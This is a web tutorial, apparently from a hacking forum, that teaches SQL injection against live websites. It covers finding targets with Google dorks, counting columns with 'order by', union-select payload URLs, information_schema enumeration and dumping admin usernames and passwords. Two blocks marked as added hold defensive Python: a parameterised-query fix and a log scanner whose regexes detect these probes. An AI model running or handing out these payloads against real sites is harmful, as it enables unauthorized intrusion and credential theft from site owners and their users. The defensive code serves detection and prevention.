
How to Hack a Website Using SQL Injection

This document provides instructions on how to perform SQL injection attacks to hack websites. It is a 7-step process: 1) Find vulnerable websites using SQL injection "dorks" in search engines 2) Determine the number of columns in the database by adding "order by" clauses 3) Find the vulnerable column using a "union select" query 4) Get the database version, name and user login with queries 5) Get the table names using "information_schema" 6) Get the column names of interesting tables such as "users" 7) Extract data such as usernames and passwords from the database

How to hack a website using SQL Injection in easy steps.

Created by hamzaisgay.
After a long time, this is my first tutorial on website hacking using the SQL Injection attack, with easy and simple steps. I have seen many people who cannot understand the SQL Injection method, because it's really very hard to understand how to inject malicious code into the URL and get the website database. So here I created an SQL Injection tutorial with easy and understandable steps; I hope you all will like it.

What is SQL Injection?

SQL Injection is one of the most popular web application hacking methods. In an SQL Injection attack, an attacker finds a vulnerability in a website (a vulnerability is a weak point of the website), injects malicious code into the URL, and gets the database of the website. This is also called exploiting the DB (database) or SQL Injection vulnerability exploitation.
Using the SQL Injection attack method, an attacker can get the complete database of the website, including user IDs and passwords. If the site is compromised, an attacker can also shut down the MySQL server so that the server stops working. An attacker can also modify the content of the website and bypass login.

✔Requirements :-
SQL Injection dorks.
A vulnerable website. (Use Google to find an SQL Injection vulnerable website.)
Firefox with the Hackbar add-on.
A little bit of understanding of SQL Injection and URLs.
A fresh mind to understand it.

✔Step 1. Find Vulnerable website.


An attacker always uses the Google, Bing, or Yahoo search engines to search for SQL Injection vulnerable websites using dorks. (A URL pattern associated with SQL Injection vulnerable websites is called a dork; it can easily be found in the URLs of such websites.)

Search for them on Google. For example, these are a few SQL Injection dorks:
___________
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________
Basically, I always use Google to search for vulnerable websites.

Here, for the tutorial, I already have one vulnerable website (but I can't reveal its name). In the search results you will find thousands of websites. The common thing in these results is that all the website URLs have this type of code at the end:
inurl:index.php?id=

Yes, they definitely will, because all these websites have a DB and URL strings related to the SQL Injection dorks.

For example: www.targetwebsite.com/index.php?id=8
✔How to Check for Vulnerability.
Open any website URL that matches an SQL Injection dork.
Put a single quote ( ' ) at the end of the website URL.
Note: To check for the vulnerability, put a single quote (') at the end of the website URL and hit Enter.
For example: www.targetwebsite.com/index.php?id=2'
If the page remains the same or is not found, then it's not vulnerable, and if the page shows an error like this :-

An error occurred...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near '/contentPage.php?id=8' at line 1

An error occurred...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near ''' at line 1

This means the website is vulnerable to SQL Injection.
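An added example (not part of the original document) showing why the single-quote check produces a database error and what removes it. It uses Python's sqlite3 as a stand-in for the PHP/MySQL page; the table layout, function names and sample rows are constructed assumptions.

```python
import sqlite3

# Probes taken from the tutorial's steps, adapted to this two-column sample query.
PROBES = ["8'", "8 order by 3", "-8 union select username,password from userDatabase"]

def make_db():
    """Constructed in-memory database standing in for the site's MySQL backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles VALUES (8, 'Welcome', 'Hello');
        CREATE TABLE userDatabase (username TEXT, password TEXT);
        INSERT INTO userDatabase VALUES ('admin', 'constructed-hash');
    """)
    return db

def page_vulnerable(db, raw_id):
    """Weak pattern: request input pasted into the SQL text, DB error echoed back."""
    sql = "SELECT title, body FROM articles WHERE id=" + raw_id
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, "An error occurred... " + str(exc)

def page_hardened(db, raw_id):
    """Fix: validate the type, bind the value as a parameter, keep DB errors server-side."""
    # isascii() guards against Unicode digits that isdigit() accepts but int() rejects;
    # the length cap keeps the value inside SQLite's integer range.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return 400, "Bad request"
    try:
        rows = db.execute("SELECT title, body FROM articles WHERE id=?",
                          (int(raw_id),)).fetchall()
    except sqlite3.Error:
        return 500, "Internal error"  # details belong in the server log only
    return (200, rows) if rows else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    for probe in ["8"] + PROBES:
        print(repr(probe), page_vulnerable(db, probe), page_hardened(db, probe))
```

With the bound parameter the probe text never reaches the SQL parser, so every later step of the tutorial has nothing to build on; the generic error page additionally removes the signal the quote check looks for.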

✔Step 2. Find the number of Columns.

Wooo hoo hoo !! We found an SQL Injection vulnerable website; now it's time to find the number of columns present in the database.

To do that, replace the single quote ( ' ) with an 'Order By no.' statement, and repeat until you get an error message.
Change the number through 1,2,3,4,5,6,7,8,9,... until you receive an error message like 'Unknown Column'.

For example: Change its order to 1, 2, 3, 4 like below:

www.targetwebsite.com/index.php?id=8Order by 1
www.targetwebsite.com/index.php?id=8Order by 2
www.targetwebsite.com/index.php?id=8Order by 3
www.targetwebsite.com/index.php?id=8Order by 4
www.targetwebsite.com/index.php?id=8Order by 5

And suppose the above method won't work, then use the method below:

www.targetwebsite.com/index.php?id=8order by 1--
www.targetwebsite.com/index.php?id=8order by 2--
www.targetwebsite.com/index.php?id=8order by 3--

If you get an error on Order by 9, that means the DB has 8 columns, and if you get an error on Order by 6, the database has 5 columns. I mean, if you put 'Order by 12' and the database has only 11 columns, then the website will show an error like this :-

An error occurred...
Unknown column '12' in 'order clause'
This trick is used to find the number of columns in the DB. Study the example below and you will understand.
www.targetwebsite.com/index.php?id=8Order by 1 (No Error)
www.targetwebsite.com/index.php?id=8Order by 2 (No Error)
www.targetwebsite.com/index.php?id=8Order by 3 (No Error)
www.targetwebsite.com/index.php?id=8Order by 4 (No Error)
www.targetwebsite.com/index.php?id=8Order by 5 (No Error)
www.targetwebsite.com/index.php?id=8Order by 6 (No Error)
www.targetwebsite.com/index.php?id=8Order by 7 (No Error)
www.targetwebsite.com/index.php?id=8Order by 8 (No Error)
www.targetwebsite.com/index.php?id=8Order by 9 (No Error)
www.targetwebsite.com/index.php?id=8Order by 10 (No Error)
www.targetwebsite.com/index.php?id=8Order by 11 (No Error)
www.targetwebsite.com/index.php?id=8Order by 12 (Error)

Here, my vulnerable website showed an error on Order by 12, which means my vulnerable website has 11 columns in its DB.

So now I have found the number of columns in my DB :-

Number of Columns = 11

✔Step 3. Find the Vulnerable Column.


Basically, if the website is vulnerable, then it has a vulnerability in one of its columns, and now it's time to find out which column.

We have successfully discovered the number of columns present in the database. Let us find the vulnerable column by using the query 'Union Select columns_sequence'.

Also change the ID value to a negative one. I mean, suppose the website has the URL index.php?id=8; change it to index.php?id=-8. Just put a minus sign "-" before the ID.

For example, if the number of columns is 11, then the query is as follows:
www.targetwebsite.com/index.php?id=-8union select 1,2,3,4,5,6,7,8,9,10,11--

And suppose the above method won't work, then use the method below:
www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11

And once the query has been executed, it will display the number of columns. Yeahh.... !!

In the above result, I found three vulnerable columns: 2, 3, and 4.

Let's take 2 for our tutorial.

Well...! We found the vulnerable columns. Now the next step.
✔Step 4. Finding version, Database and User.
Now it's time to find out the website's database version and user.
Just replace Vulnerable Column no. with "version()"

For example.
www.targetwebsite.com/index.php?id=-8union select 1,version(),3,4,5,6,7,8,9,10,11--

Now hit Enter and you will get the result.

Now do the same again: replace the vulnerable column with a different query such as database() or user(). For example:
www.targetwebsite.com/index.php?id=-8union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8union select 1,user(),3,4,5,6,7,8,9,10,11--

And suppose the above method won't work, then use the method below:

www.targetwebsite.com/index.php?id=-8and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

✔Step 5. Finding the Table name.


Here we have found the vulnerable column, the DB version, the DB name and the user; now it's time to get the table names.
If the database version is 4 or above then you have to guess the table names (Blind SQL Injection attack).

Let us now find the table names of the database. Same as before: replace the vulnerable column number with group_concat(table_name) and add "from information_schema.tables where table_schema=database()".
For example.

www.targetwebsite.com/index.php?id=-8union select 1, group_concat(table_name), 3, 4, 5, 6, 7, 8, 9, 10, 11 from information_schema.tables where table_schema=database()--

Now hit Enter and you can see the complete list of tables in the database.

Great, we found the table names. Now find the table name that is related to admin or user. As you can see in the above image, there is one table named userDatabase. Let us choose that table, userDatabase, and go to the next step.
✔Step 6. Finding the Column name.
Now, in the same way, to find the column names, replace "group_concat(table_name)" with "group_concat(column_name)" and replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".

Note: Do not hit Enter now.... First of all, convert the table name into a MySQL Char() string.

Install the Hackbar add-on in Firefox.

After installing, you can see the toolbar, and if you can't, then hit F9. Select sql -> Mysql -> MysqlChar() in the Hackbar.

Enter the table name you want to convert into MySQL Char.

Now you can see the Char like this :-

Copy and paste the code at the end of the URL in place of 'mysqlchar'.
For example.

www.targetwebsite.com/index.php?id=-8union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--

Now hit Enter and you will be able to see the column names like this :-

Great, here we found the Username and Password columns.

✔Step 7. Explore Database & Hack it.


Cool......! Now you know what to do in the next step..... Get the ID and password of the admin user by putting this command into the URL. Now replace group_concat(column_name) with group_concat(username,0x2a,password), or with any other column name whose data you want to get.

For example.

and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--
If the above command doesn't work, then use the column names from the first one onward, put in all the columns at one time, and you will be able to get the complete database.

Now find the Admin page using this method: How to hack a website using Havij.
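An added detection example (not part of the original document): the probes used in Steps 1 to 7 leave recognisable strings in web server access logs, and this scanner flags them per client. The rule names, log layout and sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the request strings this tutorial walks through (Steps 1-7).
RULES = {
    "quote_probe":    re.compile(r"=-?\d+'"),
    "order_by_count": re.compile(r"order\s+by\s+\d+", re.I),
    "union_select":   re.compile(r"union\s+(all\s+)?select", re.I),
    "schema_enum":    re.compile(r"information_schema\.(tables|columns)", re.I),
    "fingerprint":    re.compile(r"(version|database|user)\(\)|@@version", re.I),
    "char_encoding":  re.compile(r"char\(\s*\d+\s*(,\s*\d+\s*)+\)", re.I),
    "group_concat":   re.compile(r"group_concat\(", re.I),
}
# Common/combined access log layout: client, two ids, [time], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=8 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=how+to+order+books HTTP/1.1" 200 90',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 312',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=8+order+by+12-- HTTP/1.1" 500 300',
    '198.51.100.9 - - [01/Jan/2024:10:00:14 +0000] "GET /index.php?id=-8+union+select+1,version(),3 HTTP/1.1" 200 520',
    '198.51.100.9 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?id=-8+union+select+1,'
    'group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 700',
]

def scan(lines):
    """Return {client_ip: sorted rule names} for requests whose decoded query matches a rule."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected layout
        ip, target, _status = m.groups()
        query = unquote_plus(target.partition("?")[2])  # decode %27, %20 and '+'
        matched = {name for name, rx in RULES.items() if rx.search(query)}
        if matched:
            hits.setdefault(ip, set()).update(matched)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, names)
```

A single client that trips several of these rules within a short window is a much stronger signal than any one match, since a lone `order by` or `version()` string can appear in legitimate search queries.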
